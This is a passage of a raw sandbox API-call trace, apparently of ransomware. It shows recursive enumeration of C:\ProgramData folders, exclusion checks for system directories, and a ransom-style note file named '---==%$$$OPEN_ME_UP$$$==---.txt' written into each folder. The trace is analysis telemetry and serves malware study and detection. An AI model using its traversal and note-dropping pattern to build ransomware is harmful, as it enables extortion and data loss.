lpString2="Windows") returned -1 [0067.371] lstrcmpiW (lpString1="Reader_15.023.20070", lpString2="$Recycle.bin") returned 1 [0067.371] lstrcmpiW (lpString1="Reader_15.023.20070", lpString2="System Volume Information") returned -1 [0067.371] lstrcmpiW (lpString1="Reader_15.023.20070", lpString2="Program Files") returned 1 [0067.371] lstrcmpiW (lpString1="Reader_15.023.20070", lpString2="Program Files (x86)") returned 1 [0067.371] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070") returned 48 [0067.371] lstrcmpW (lpString1="Reader_15.023.20070", lpString2=".") returned 1 [0067.372] lstrcmpW (lpString1="Reader_15.023.20070", lpString2="..") returned 1 [0067.372] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.372] GetProcessHeap () returned 0xbe0000 [0067.372] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.372] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\*") returned 50 [0067.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d2868f, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0xa7140105, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x2797fc81, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e60 [0067.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.372] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.372] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.372] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.372] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.372] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\.") returned 50 [0067.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.372] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d2868f, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0xa7140105, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x2797fc81, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.372] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.372] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.372] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.372] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.372] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\..") returned 51 [0067.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.372] FindNextFileW (in: hFindFile=0xc19e60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8d2868f, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0xa7140105, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x2797fc81, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0067.372] FindClose (in: hFindFile=0xc19e60 | out: hFindFile=0xc19e60) returned 1 [0067.373] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 80 [0067.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_15.023.20070\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\adobe\\arm\\reader_15.023.20070\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.373] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0067.374] CloseHandle (hObject=0x430) returned 1 [0067.374] GetProcessHeap () returned 0xbe0000 [0067.374] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0067.374] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdcb711fb, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0x3c33d412, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x4b9b7315, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="S", cAlternateFileName="")) returned 1 [0067.374] lstrcmpiW (lpString1="S", lpString2="Windows") returned -1 [0067.374] lstrcmpiW (lpString1="S", lpString2="$Recycle.bin") returned 1 [0067.374] lstrcmpiW (lpString1="S", lpString2="System Volume Information") returned -1 [0067.374] lstrcmpiW (lpString1="S", lpString2="Program Files") returned 1 [0067.374] lstrcmpiW (lpString1="S", lpString2="Program Files (x86)") returned 1 [0067.374] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S") returned 30 [0067.374] lstrcmpW (lpString1="S", lpString2=".") returned 1 [0067.374] lstrcmpW (lpString1="S", lpString2="..") returned 1 [0067.374] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.374] GetProcessHeap () returned 0xbe0000 [0067.374] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0067.374] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S\\*") returned 32 [0067.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdcb711fb, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0x3c33d412, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x4b9b7315, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fa0 [0067.375] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.375] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.375] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.375] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.375] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.375] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S\\.") returned 32 [0067.375] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.375] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdcb711fb, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0x3c33d412, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x4b9b7315, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.375] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.375] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.375] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.375] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.375] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.375] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S\\..") returned 33 [0067.375] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.375] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.375] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdcb711fb, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0x3c33d412, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x4b9b7315, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0067.375] FindClose (in: hFindFile=0xc19fa0 | out: hFindFile=0xc19fa0) returned 1 [0067.375] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0067.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\S\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\adobe\\arm\\s\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0067.376] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0067.377] CloseHandle (hObject=0x430) returned 1 [0067.377] GetProcessHeap () returned 0xbe0000 [0067.377] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0067.377] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xdcb711fb, ftCreationTime.dwHighDateTime=0x1d38c43, ftLastAccessTime.dwLowDateTime=0x3c33d412, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x4b9b7315, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="S", cAlternateFileName="")) returned 0 [0067.377] FindClose (in: hFindFile=0xc19f20 | out: hFindFile=0xc19f20) returned 1 [0067.377] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 60 [0067.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\adobe\\arm\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0067.377] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0067.378] CloseHandle (hObject=0x42c) returned 1 [0067.378] GetProcessHeap () returned 0xbe0000 [0067.378] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0067.378] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4511a9a6, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x28e82a8b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x28e82a8b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ARM", cAlternateFileName="")) returned 0 [0067.378] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0067.378] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 56 [0067.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\adobe\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.379] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0067.380] CloseHandle (hObject=0x428) returned 1 [0067.380] GetProcessHeap () returned 0xbe0000 [0067.380] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.380] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8000000, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0067.380] lstrcmpiW (lpString1="Application Data", lpString2="Windows") returned -1 [0067.380] lstrcmpiW (lpString1="Application Data", lpString2="$Recycle.bin") returned 1 [0067.380] lstrcmpiW (lpString1="Application Data", lpString2="System Volume Information") returned -1 [0067.380] lstrcmpiW (lpString1="Application Data", lpString2="Program Files") returned -1 [0067.380] lstrcmpiW (lpString1="Application Data", lpString2="Program Files (x86)") returned -1 [0067.380] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data") returned 35 [0067.380] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0067.380] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0067.380] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Application Data", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.380] GetProcessHeap () returned 0xbe0000 [0067.380] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.380] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data\\*") returned 37 [0067.380] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4511a9a6, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x28e82a8b, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x28e82a8b, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AR?", cAlternateFileName="揸Â￿￿扨@￿￿揸Â\x05")) returned 0xffffffff [0067.381] GetProcessHeap () returned 0xbe0000 [0067.381] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.381] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8000000, cFileName="Comms", cAlternateFileName="")) returned 1 [0067.381] lstrcmpiW (lpString1="Comms", lpString2="Windows") returned -1 [0067.381] lstrcmpiW (lpString1="Comms", lpString2="$Recycle.bin") returned 1 [0067.381] lstrcmpiW (lpString1="Comms", lpString2="System Volume Information") returned -1 [0067.381] lstrcmpiW (lpString1="Comms", lpString2="Program Files") returned -1 [0067.381] lstrcmpiW (lpString1="Comms", lpString2="Program Files (x86)") returned -1 [0067.381] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms") returned 24 [0067.381] lstrcmpW (lpString1="Comms", lpString2=".") returned 1 [0067.381] lstrcmpW (lpString1="Comms", lpString2="..") returned 1 [0067.381] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Comms", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.381] GetProcessHeap () returned 0xbe0000 [0067.381] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.381] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms\\*") returned 26 [0067.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Comms\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0067.382] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0067.382] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0067.382] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0067.382] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0067.382] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0067.382] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms\\.") returned 26 [0067.382] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.382] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0067.382] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0067.382] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0067.382] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0067.382] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0067.382] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0067.382] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms\\..") returned 27 [0067.382] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.382] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.382] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0067.382] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0067.382] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Comms\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 56 [0067.382] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Comms\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\comms\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.383] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0067.384] CloseHandle (hObject=0x428) returned 1 [0067.384] GetProcessHeap () returned 0xbe0000 [0067.384] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.384] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8000000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0067.384] lstrcmpiW (lpString1="Desktop", lpString2="Windows") returned -1 [0067.384] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0067.384] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0067.384] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0067.384] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0067.384] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop") returned 26 [0067.384] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0067.384] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0067.384] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Desktop", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.384] GetProcessHeap () returned 0xbe0000 [0067.384] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.384] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop\\*") returned 28 [0067.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..?", cAlternateFileName="揸Â￿￿扨@￿￿揸Â\x05")) returned 0xffffffff [0067.385] GetProcessHeap () returned 0xbe0000 [0067.385] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0067.385] FindNextFileW (in: hFindFile=0xc19f60, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8000000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0067.385] lstrcmpiW (lpString1="Documents", lpString2="Windows") returned -1 [0067.385] lstrcmpiW (lpString1="Documents", lpString2="$Recycle.bin") returned 1 [0067.385] lstrcmpiW (lpString1="Documents", lpString2="System Volume Information") returned -1 [0067.385] lstrcmpiW (lpString1="Documents", lpString2="Program Files") returned -1 [0067.385] lstrcmpiW (lpString1="Documents", lpString2="Program Files (x86)") returned -1 [0067.385] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents") returned 28 [0067.385] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0067.385] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0067.385] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Documents", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0067.385] GetProcessHeap () returned 0xbe0000 [0067.385] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0067.385] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Documents\\*") returned 30 [0067.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Documents\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, 